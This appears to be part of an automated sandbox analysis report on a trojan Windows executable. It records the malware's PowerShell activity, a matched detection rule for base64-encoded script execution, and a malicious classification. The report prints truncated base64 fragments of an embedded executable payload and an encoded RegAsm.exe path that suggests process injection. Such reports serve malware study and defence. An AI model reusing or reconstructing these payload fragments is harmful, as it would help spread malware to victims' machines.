Source: file.exe	Binary or memory string: OriginalFilenamemscordaccore.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameIncrease.dll2 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.Collections.Immutable.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.Diagnostics.StackTrace.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.IO.MemoryMappedFiles.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.ObjectModel.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.Reflection.Metadata.dll@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSystem.dll@ vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Process created: Commandline size = 10153
Source: C:\Users\user\Desktop\file.exe	Process created: Commandline size = 10153			Jump to behavior

Source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 1.2.powershell.exe.8110000.5.raw.unpack, Program.cs	Base64 encoded string: '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
Source: 1.2.powershell.exe.8110000.5.raw.unpack, Mov.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
Source: 1.2.powershell.exe.8110000.5.raw.unpack, SWFT.cs	Base64 encoded string: 'NkxyMHAvcnB6ckRsNmF6dzhwREQ2THIvODY2OW11UzY2YXo3czQzMHFQcW44cnJpOUtydThwREQ2THIvODY2OW11UzY2YXo3czV2b3ArbWc4S3k0MUtmcHJPK203WnJ6NzcvMHF2aTZwc1Nja01QdHZQK2w5S3EyL3FYOHV1N3AxYWo3K0x2TnZPNmhrTVB0a01POTZiM3B2cnZ6K3FEeXA3Mks4cWZnK0x2dW9QS24wS3ppOWFiNXVwRER2ZW0ydmJub3EvR2cvdW5sNmFqcG9QN3AxS2ZpclArOWl2S242NnprNlozeWdQTzlyUCsrLzdEcHJNYVV2Yi8zOGJ6NDViMmc4NzIyN3IzOHUrbUE4NjN6NWVDUXc3M3B2ZW50a01POTZiM3B2ZW0ydmJ2NHZlaTc4K25VOUwzZXB2Ty8rTHZpK0x1em5mS0E4NzJucStIcnFQRzgrT1cyN3IzOHUrbUE4NjN6NWVDbXhKZnB2ZW0yNE1TWHhKZnB2ZW0yN2J6L3BmU3F2YnJpL0wzMHFyMkE4NzJscituZXB2Ty8rTHZpeWFiVXArbjZyK0gwNUwzNGtzRHA2Nmo2Nkt5eDZmU242ZW5sNmFqdnZkU24rYXp1dE1TWDZiM3B2YktibCttOTZiM3B2ZW0yNzZ6cHZPK252WXYvNllyeXArdXM3NzN6NytmSnB0U242ZnFrdGIvOHBlaXNzZW5sNmFqdnZkU24rYXp1dFBLUXc3M3B2ZW5ya01PUXc3M3B2ZW5tNkt2eG9QN3A3cjMzNmFEKzZmK3c2YXpOd09uZXB2Ty8rTHZpeWFiZnNPbXM3dUgvODcyOXYveWw2S3kva01POTZiM3A1c1NjdmVtOTZiM3B2ZW5rK0wzb3UvUHAzNkRpM3FienYvaTc2YXprczQ3NHZkK3c2YXpsdGIvOHBlaXN0UEtibCttOTZiMjBrTU8ydmVtOTZ2aW4rYnZ6K3FEeXA1RERrTU8ydmVtOTZ1K3MrcUQ1OCtuY3VmU0gvS1R6N3NTWDZiM3B2Ym5qLzZYMHFyMjY2YWppOUtxOXV1bTc5S2Z4eHBTOWp2aTkzTG4vMDZqd3JPN2h0TVNjdmVtOTZlYkVsK20ydmVtOTZiM3A3NnppNkx2ejZmT3M2dW5sNmJ2MHAvcVN3TVNjdmVtOTZiM3B2ZW50a01POTZiM3B2ZW0ydmVtOTZiM3I5cXprODZ6eCtxL3JzY1NjdmVtOTZiM3B2ZW0ydmVtOTYvTzkrYVg2ditXUXc3M3B2ZW0ydmVtOTZiM3B2ZXZFK0xyb3BQaWQ5YnZ6L0syLzVaRER2ZW0ydmVtOTZiM3B2ZW0ydjU3eXZxdjl6cXppeWFIdnJQeXQzcWI0NmF6bHZiL2xrTU8ydmVtOTZiM3B2ZW0ydmVtL212aTl5YUhrK0tqNWl2S242YXp1NmV1eHhKZnB2ZW0ydmVtOTZiM3B2ZW0weXFicS82bU8rTDNDOWJ2NHFQbUs4cWZpK0xIcDY3SEVsK20ydmVtOTZiM3B2ZW0ydmV2YXJPbWQ5YnZ6L0szZXB2TzkrTEhpditXUXc3M3B2ZW0ydmVtOTZiM3B2ZXZBOUx2cHZQeWwzS1g2OHFyWXNiL2xrTU8ydmVtOTZiM3B2ZW0ydmVtL251K2c2YXpHNzZiK3JPNjYwS3o3OHJ2azY3SEVsK20ydmVtOTZiM3B2ZW0ydmV2UHJQeXR6YnY1L3F6dXV0Q3M4S2JrNU91eHhKZnB2ZW0ydmVtOTZiM3B2ZW0weDc3SXAvQ283Wi8vK0w3U3I4NnMvcjMvOHFlLzVaRER2ZW0ydmVtOTZiM3B2ZW0ydjRydnJQeTkrSm5rOHFyNHV1Nkl2OFNjdmVtOTZiM3B2ZW5ycHNTWDZiM3B2YlNibCttOTZiM3ErS2Z5NzZ6Nm9QS25rTU9ibCttOTZiM3E3Nnp4OUtiejZkeTU5STN6OGF6NnFPbXM3c1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OW9QTzl2WnZ6N3J6d3JNbWg3NnozK1kzNHBmaXUvTDN6dFlEenZjMjk3K24rL0tmNXBmamdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OXEvS204ZW5GK0wzS3B1ci9xWjMrNzZ6OHJkNm04NzN6NWIzWnJQR3MrcWppK09IVXArbVo2YnUyNmFIdnJQeXRzZW4vODczR2xMMnE4cWZpK0xIcDRLYkVsK20ydmVudHUvUy8vTDN6dmEzNHBmaXUvTDN6dmF2eXB2SHB6cXppeWFIdnJQeXQzcWI0NmF6bHZkbXM4YXp4L0wzNDRkU242Wm5pNytucG9lK3MvSzI2dmFEenZjYVV2YXI1ODczNHNlbmdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OXEvS204ZW5SK0wzS3B1ci9xWjMrNzZ6OHJkNm04NzN6NWIzWnJQR3MrcWppK09IVXArbVo2YnUyNmFIdnJQeXRzZW4vODczR2xMMnE4cWZpK0xIcDRLYkVsK20ydmVudHUvUy8vTDN6dmEzNHBmaXUvTDN6dmF2eXB2SHAycXppeWFIdnJQeXQzcWI0NmF6bHZkbXM4YXp4L0wzNDRkU242Wm5pNytucG9lK3MvSzI2dmFEenZjYVV2YXI1ODczNHNlbmdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OW9QTzl2Wi8vNzczb3FQR0k4YVg1L296bGpmaWwrSzczNmF5MWdQTzl6YjNrdmFIOHAvbWwrT1cyOUtmcDZmeXQrYnZ6N3JxeDZmU242ZW42K0tmNnZmWGx2YUQ0NmVucHNPMnNzZW4vODcyOXVlK202YXoxNmVDbXhKZnB2ZW0yN2J2MHYveTkrT255K0tYNHJ2eTkrT24wOHFieDZjcTc5TDN6MEt6d3B1K3cyYXo2K0s3OHZmamgxS2ZpemIzdjZ
Source: 1.2.powershell.exe.59ac4a8.3.raw.unpack, Program.cs	Base64 encoded string: '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
Source: 1.2.powershell.exe.59ac4a8.3.raw.unpack, Mov.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
Source: 1.2.powershell.exe.59ac4a8.3.raw.unpack, SWFT.cs	Base64 encoded string: 'NkxyMHAvcnB6ckRsNmF6dzhwREQ2THIvODY2OW11UzY2YXo3czQzMHFQcW44cnJpOUtydThwREQ2THIvODY2OW11UzY2YXo3czV2b3ArbWc4S3k0MUtmcHJPK203WnJ6NzcvMHF2aTZwc1Nja01QdHZQK2w5S3EyL3FYOHV1N3AxYWo3K0x2TnZPNmhrTVB0a01POTZiM3B2cnZ6K3FEeXA3Mks4cWZnK0x2dW9QS24wS3ppOWFiNXVwRER2ZW0ydmJub3EvR2cvdW5sNmFqcG9QN3AxS2ZpclArOWl2S242NnprNlozeWdQTzlyUCsrLzdEcHJNYVV2Yi8zOGJ6NDViMmc4NzIyN3IzOHUrbUE4NjN6NWVDUXc3M3B2ZW50a01POTZiM3B2ZW0ydmJ2NHZlaTc4K25VOUwzZXB2Ty8rTHZpK0x1em5mS0E4NzJucStIcnFQRzgrT1cyN3IzOHUrbUE4NjN6NWVDbXhKZnB2ZW0yNE1TWHhKZnB2ZW0yN2J6L3BmU3F2YnJpL0wzMHFyMkE4NzJscituZXB2Ty8rTHZpeWFiVXArbjZyK0gwNUwzNGtzRHA2Nmo2Nkt5eDZmU242ZW5sNmFqdnZkU24rYXp1dE1TWDZiM3B2YktibCttOTZiM3B2ZW0yNzZ6cHZPK252WXYvNllyeXArdXM3NzN6NytmSnB0U242ZnFrdGIvOHBlaXNzZW5sNmFqdnZkU24rYXp1dFBLUXc3M3B2ZW5ya01PUXc3M3B2ZW5tNkt2eG9QN3A3cjMzNmFEKzZmK3c2YXpOd09uZXB2Ty8rTHZpeWFiZnNPbXM3dUgvODcyOXYveWw2S3kva01POTZiM3A1c1NjdmVtOTZiM3B2ZW5rK0wzb3UvUHAzNkRpM3FienYvaTc2YXprczQ3NHZkK3c2YXpsdGIvOHBlaXN0UEtibCttOTZiMjBrTU8ydmVtOTZ2aW4rYnZ6K3FEeXA1RERrTU8ydmVtOTZ1K3MrcUQ1OCtuY3VmU0gvS1R6N3NTWDZiM3B2Ym5qLzZYMHFyMjY2YWppOUtxOXV1bTc5S2Z4eHBTOWp2aTkzTG4vMDZqd3JPN2h0TVNjdmVtOTZlYkVsK20ydmVtOTZiM3A3NnppNkx2ejZmT3M2dW5sNmJ2MHAvcVN3TVNjdmVtOTZiM3B2ZW50a01POTZiM3B2ZW0ydmVtOTZiM3I5cXprODZ6eCtxL3JzY1NjdmVtOTZiM3B2ZW0ydmVtOTYvTzkrYVg2ditXUXc3M3B2ZW0ydmVtOTZiM3B2ZXZFK0xyb3BQaWQ5YnZ6L0syLzVaRER2ZW0ydmVtOTZiM3B2ZW0ydjU3eXZxdjl6cXppeWFIdnJQeXQzcWI0NmF6bHZiL2xrTU8ydmVtOTZiM3B2ZW0ydmVtL212aTl5YUhrK0tqNWl2S242YXp1NmV1eHhKZnB2ZW0ydmVtOTZiM3B2ZW0weXFicS82bU8rTDNDOWJ2NHFQbUs4cWZpK0xIcDY3SEVsK20ydmVtOTZiM3B2ZW0ydmV2YXJPbWQ5YnZ6L0szZXB2TzkrTEhpditXUXc3M3B2ZW0ydmVtOTZiM3B2ZXZBOUx2cHZQeWwzS1g2OHFyWXNiL2xrTU8ydmVtOTZiM3B2ZW0ydmVtL251K2c2YXpHNzZiK3JPNjYwS3o3OHJ2azY3SEVsK20ydmVtOTZiM3B2ZW0ydmV2UHJQeXR6YnY1L3F6dXV0Q3M4S2JrNU91eHhKZnB2ZW0ydmVtOTZiM3B2ZW0weDc3SXAvQ283Wi8vK0w3U3I4NnMvcjMvOHFlLzVaRER2ZW0ydmVtOTZiM3B2ZW0ydjRydnJQeTkrSm5rOHFyNHV1Nkl2OFNjdmVtOTZiM3B2ZW5ycHNTWDZiM3B2YlNibCttOTZiM3ErS2Z5NzZ6Nm9QS25rTU9ibCttOTZiM3E3Nnp4OUtiejZkeTU5STN6OGF6NnFPbXM3c1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OW9QTzl2WnZ6N3J6d3JNbWg3NnozK1kzNHBmaXUvTDN6dFlEenZjMjk3K24rL0tmNXBmamdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OXEvS204ZW5GK0wzS3B1ci9xWjMrNzZ6OHJkNm04NzN6NWIzWnJQR3MrcWppK09IVXArbVo2YnUyNmFIdnJQeXRzZW4vODczR2xMMnE4cWZpK0xIcDRLYkVsK20ydmVudHUvUy8vTDN6dmEzNHBmaXUvTDN6dmF2eXB2SHB6cXppeWFIdnJQeXQzcWI0NmF6bHZkbXM4YXp4L0wzNDRkU242Wm5pNytucG9lK3MvSzI2dmFEenZjYVV2YXI1ODczNHNlbmdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OXEvS204ZW5SK0wzS3B1ci9xWjMrNzZ6OHJkNm04NzN6NWIzWnJQR3MrcWppK09IVXArbVo2YnUyNmFIdnJQeXRzZW4vODczR2xMMnE4cWZpK0xIcDRLYkVsK20ydmVudHUvUy8vTDN6dmEzNHBmaXUvTDN6dmF2eXB2SHAycXppeWFIdnJQeXQzcWI0NmF6bHZkbXM4YXp4L0wzNDRkU242Wm5pNytucG9lK3MvSzI2dmFEenZjYVV2YXI1ODczNHNlbmdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OW9QTzl2Wi8vNzczb3FQR0k4YVg1L296bGpmaWwrSzczNmF5MWdQTzl6YjNrdmFIOHAvbWwrT1cyOUtmcDZmeXQrYnZ6N3JxeDZmU242ZW42K0tmNnZmWGx2YUQ0NmVucHNPMnNzZW4vODcyOXVlK202YXoxNmVDbXhKZnB2ZW0yN2J2MHYveTkrT255K0tYNHJ2eTkrT24wOHFieDZjcTc5TDN6MEt6d3B1K3cyYXo2K0s3OHZmamgxS2ZpemIzdjZ

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@10/9@12/9

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00975A10 FormatMessageW,GetLastError,WideCharToMultiByte,GetLastError,WideCharToMultiByte,WideCharToMultiByte,MultiByteToWideChar,MultiByteToWideChar,wcscpy_s,HeapFree,HeapFree,

0_2_00975A10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00426530 CoCreateInstance,

5_2_00426530

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_353e4xkt.405.ps1

Jump to behavior

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.62%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: file.exe	String found in binary or memory: Morph - Structs/AddrExp
Source: file.exe	String found in binary or memory: prejitNYI: patchpoint info generationlooptail.call and not BBINSTRImportationPre-importExpand patchpointsIndirect call transformProfile instrumentation prepPost-importProfile incorporationProfile instrumentationMorph - InliningMorph - InitAllocate ObjectsMorph - Add internal blocksRemove empty finallyRemove empty tryClone finallyMerge callfinally chainsUpdate flow graph early passUpdate finally target flagsEarly livenessMorph - Structs/AddrExpForward SubstitutionPhysical promotionMorph - ByRefsIdentify candidates for implicit byref copy omissionMorph - GlobalMorph - Promote StructsGS CookieMorph - FinishTail mergeCompute edge weights (1, false)Invert loopsMerge throw blocksOptimize control flowPost-morph tail mergeCompute blocks reachabilityOptimize layoutRedundant zero InitsSet block weightsClone loopsFind loopsClear loop infoUnroll loopsHoist loop codeMorph array opsOptimize boolsMark local varsSet block orderFind oper orderSSA: topological sortBuild SSA representationSSA: livenessSSA: Doms1SSA: insert phisSSA: DFEarly Value PropagationSSA: renameOptimize index checksDo value numberingVN based copy propOptimize Valnum CSEsRedundant branch optsVN based intrinsic expansionIf conversionAssertion propUpdate flow graph opt passVN-based dead store removalStress gtSplitTreeCompute edge weights (2, false)Expand static initExpand runtime lookupsInsert GC PollsExpand TLS accessRationalize IRDetermine first cold blockLocal var livenessDo 'simple' loweringPer block local var livenessLocal var liveness initLowering decompositionGlobal local var livenessCalculate stack level slotsLowering nodeinfoLSRA build intervalsLinear scan register allocLSRA resolveLSRA allocateGenerate codePlace 'align' instructionsEmit GC+EH tablesEmit codePost-EmitJIT Compilation time report:
Source: file.exe	String found in binary or memory: GC initialization failed with error 0x%08Xkernelbase.dllMapViewOfFile3VirtualAlloc2bad array new lengthstring too longUsing internal fxrApplication root path is empty. This shouldn't happenUsing internal hostpolicy--additionalprobingpathPath containing probing policy and assemblies to probe for.<path>Path to <application>.deps.json file.--depsfilePath to <application>.runtimeconfig.json file.--runtimeconfig<version>--fx-version--roll-forwardVersion of the installed Shared Framework to use to run the application.Roll forward to framework version (LatestPatch, Minor, LatestMinor, Major, LatestMajor, Disable)<value>Path to additional deps.json file.--additional-deps<n>--roll-forward-on-no-candidate-fxsdk<obsolete>Failed to parse supported options or their values:Parsed known arg %s = %sUsing the provided arguments to determine the application to execute. %s %-*s %sApplication '%s' does not exist.Application '%s' is not a managed executable.The application to execute does not exist: '%s'dotnet exec needs a managed .dll or .exe extension. The application specified was '%s'--- Executing in a native executable mode...--- Executing in split/FX mode...exec--- Executing in muxer mode...
